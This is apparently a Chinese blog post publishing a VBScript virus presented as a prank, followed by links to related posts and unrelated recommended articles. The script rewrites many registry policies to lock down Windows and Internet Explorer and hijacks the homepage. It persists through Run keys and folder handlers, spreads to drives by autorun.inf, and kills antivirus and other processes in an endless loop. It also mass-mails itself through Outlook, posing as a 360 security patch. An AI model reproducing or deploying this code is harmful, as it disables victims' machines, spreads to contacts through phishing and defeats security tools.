转载请注明出处

有点小恶意哦!慎重测试

'This procedure is written in SeChaos, only for entertainment, not malicious communication, crack or rewrite.I am not liable, the final interpretation of all SeChaos.
dim fso,wsh,myfile,ws,pp,fsoFolder 
set wsh=wscript.createobject("wscript.shell") 
set fso=wscript.createobject("scripting.filesystemobject") 
set myfile=fso.GetFile(wscript.scriptfullname) 
'To modify the registry (start menu which things and the IE settings)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs" 
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'" 
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'Modify default file Icon
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico" 
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,Chaobs和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ5788*****联系"
'Copy itself to the C, D, E, F, U disk
myfile.copy "c:\" 
myfile.copy "D:\" 
myfile.copy "E:\"
myfile.copy "F:\" 
myfile.copy "I:\" 
myfile.attributes=34 
'Define the Autorun.inf content that is U disk virus must be part of the code
If fso.FileExists("C:\autorun.inf") Then 
Set objFolder = fso.GetFile("C:\autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_ 
&"&& echo open=NYboy.bat >>C:\autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_ 
&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_ 
&"&& echo shell=Auto>>C:\autorun.inf"_ 
&"&& attrib +h +s +r C:\autorun.inf" 
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then 
Set objFolder = fso.GetFile("D:\autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_ 
&"&& echo open=NYboy.bat >>D:\autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_ 
&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_ 
&"&& echo shell=Auto>>D:\autorun.inf"_ 
&"&& attrib +h +s +r D:\autorun.inf" 
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then 
Set objFolder = fso.GetFile("E:\autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_ 
&"&& echo open=NYboy.bat >>E:\autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_ 
&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_ 
&"&& echo shell=Auto>>E:\autorun.inf"_ 
&"&& attrib +h +s +r E:\autorun.inf" 
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then 
Set objFolder = fso.GetFile("F:\autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_ 
&"&& echo open=NYboy.bat >>F:\autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_ 
&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_ 
&"&& echo shell=Auto>>F:\autorun.inf"_ 
&"&& attrib +h +s +r F:\autorun.inf" 
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then 
Set objFolder = fso.GetFile("I:\autorun.inf") 
Else 
wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_ 
&"&& echo open=NYboy.bat >>I:\autorun.inf"_ 
&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_ 
&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_ 
&"&& echo shell=Auto>>I:\autorun.inf"_ 
&"&& attrib +h +s +r I:\autorun.inf" 
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Set attributes for the system read only hidden virus body
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_ 
&"&& attrib +h +s +r D:\NYboy.bat"_ 
&"&& attrib +h +s +r E:\NYboy.bat"_ 
&"&& attrib +h +s +r F:\NYboy.bat"_ 
&"&& attrib +h +s +r I:\NYboy.bat"
'Mandatory end of certain processes, such as QQ, Notepad, webpage, batch file, carbachol, realplay process, after running to open these files
do 
set ws=getobject("winmgmts:\\.\root\cimv2") 
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'") 
for each i in pp 
i.terminate()
wscript.sleep 100 
next 
loop
'The virus can be spread by mail
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="360病毒测试"
Mail.Body="尊敬的用户您好:为了更好的服务用户,加强360病毒防范能力,特发此补丁,详细可在官网查询。具体测试请按随信附件进行,您可能需要关闭或阻止旧版360运行以便在线升级。谢谢合作               360研发中心"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit

 
 

Vbs 测试程序一的更多相关文章

  1. Vbs 测试程序三

    一段被写滥了的VBS代码 值得一提的是感兴趣的同学可以把 chr(13) + chr(13) + chr(13) 改为chr(11) + chr(11) + chr(11) 不赘述 on error ...

  2. Vbs 测试程序二

    这是一段原载于百度百科上的代码,Chaobs转载 原帖已删,就是怕有人用这个恶意程序. 慎用! dim folder,fso,foldername,f,d,dc set fso=createobjec ...

  3. Oracle使用ODBC连接配置

    该配置是在windows 7 32位下进行的,程序已经通过了测试(使用VBS进行的测试) 1.文件下载 ------------------------------------------------ ...

  4. snip_opencv环境配置和测试程序

    opencv2.4.9环境变量配置的记录. 2014年8月10日 Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp ...

  5. C#调用vbs脚本实现Windows版Siri

    最近新加入,把自己一些有意思的小东西分享给大家,我是一个学生,代码写得少,哪里不规范,希望大家见谅. 这事我封装好的一个类,可以直接实例化对象之后,调用"对象.Talk()"方法, ...

  6. vbs连接sql server及写文件操作

    此段代码是连接SQL SERVER的 代码内connMMSQL的参数要根据实际情况传入 Function connMMSQL(ip,user,pwd,database,strsql) Dim conn ...

  7. 在WinCC中通过VBS操作SQL Server2005

    在项目中需要在一定条件满足时,保存一些数据到数据库中,并可根据条件查询.考虑到WinCC6.2以后采用的就是SQL Server2005数据库,所以直接利用该数据库即可,通过SQL Server Ma ...

  8. 使用vbs脚本进行批量编码转换

    使用vbs脚本进行批量编码转换 最近需要使用SourceInsight查看分析在Linux系统下开发的项目代码,我们知道Linux系统中文本文件默认编码格式是UTF-8,而Windows中文系统中的默 ...

  9. Spring+SpringMvc+Mybatis框架集成搭建教程三(框架整合测试程序开发)

    框架整合测试程序开发 (1).在mysql数据库中创建t_user表,sql语句如下 CREATE TABLE `t_user` ( `id` bigint(20) NOT NULL AUTO_INC ...

随机推荐

  1. 验证tensorflow版本是GPU还是CPU

    reference: https://blog.csdn.net/zlase/article/details/79261348 import numpy import tensorflow as tf ...

  2. Google Java编程风格指南(转)

    目录 前言 源文件基础 源文件结构 格式 命名约定 编程实践 Javadoc 后记 前言 这份文档是Google Java编程风格规范的完整定义.当且仅当一个Java源文件符合此文档中的规则, 我们才 ...

  3. Poj(2236),简单并查集

    题目链接:http://poj.org/problem?id=2236 思路很简单,傻逼的我输出写成了FALL,然后遍历的时候for循环写错了,还好很快我就Debug出来了. #include < ...

  4. 第33章 TIM—电容按键检测—零死角玩转STM32-F429系列

    第33章     TIM—电容按键检测 全套200集视频教程和1000页PDF教程请到秉火论坛下载:www.firebbs.cn 野火视频教程优酷观看网址:http://i.youku.com/fir ...

  5. iOS第三方开放者平台概览

    前言:记录一些可能用到过的第三方开放者平台相关内容 视频类: 腾讯云移动直播:https://cloud.tencent.com/product/mlvb 遇到问题后发起工单是一种比较好的解决问题的方 ...

  6. python配置日志的几种方式

    使用的是logging模块,关于logging模块内容,可以看我的另一篇博客:https://www.cnblogs.com/kuxingseng95/p/9464347.html 作为开发者,我们一 ...

  7. WebAppBuilder独立于Portal之arcgis for js应用框架研究

    1.前言 最近在做项目过程中,用到了WAB,先做一下总结和归类.Webappbuilder(简称WAB)是运行在portal或者online的一款webGIS开发应用程序,其代码开源并且具有优秀的设计 ...

  8. 牛客小白月赛2 D 虚虚实实 【欧拉图】【连通图】

    链接:https://www.nowcoder.com/acm/contest/86/D来源:牛客网 题目描述 震为雷,临危不乱,亨通畅达:巽为风,柔顺伸展,厚载万物. 震卦:洊雷,震,君子以恐惧修省 ...

  9. P2661 信息传递 DFS

    题目链接:洛谷 P2661 信息传递 一个人要想知道自己的生日,就意味着信息的传递是成环的,因为每轮信息只能传递一个人,传递的轮数就等于环的大小 环的大小就等于环中的两个点到第三个点的距离之和加一,我 ...

  10. 【清真dp】cf1144G. Two Merged Sequences

    成就:赛后在cf使用错误的贪心通过一题 成就:在cf上赛后提交hack数据 成就:在cf上赛后hack自己 题目大意 有一长度$n \le 2\times 10^5$的序列,要求判断是否能够划分为一个 ...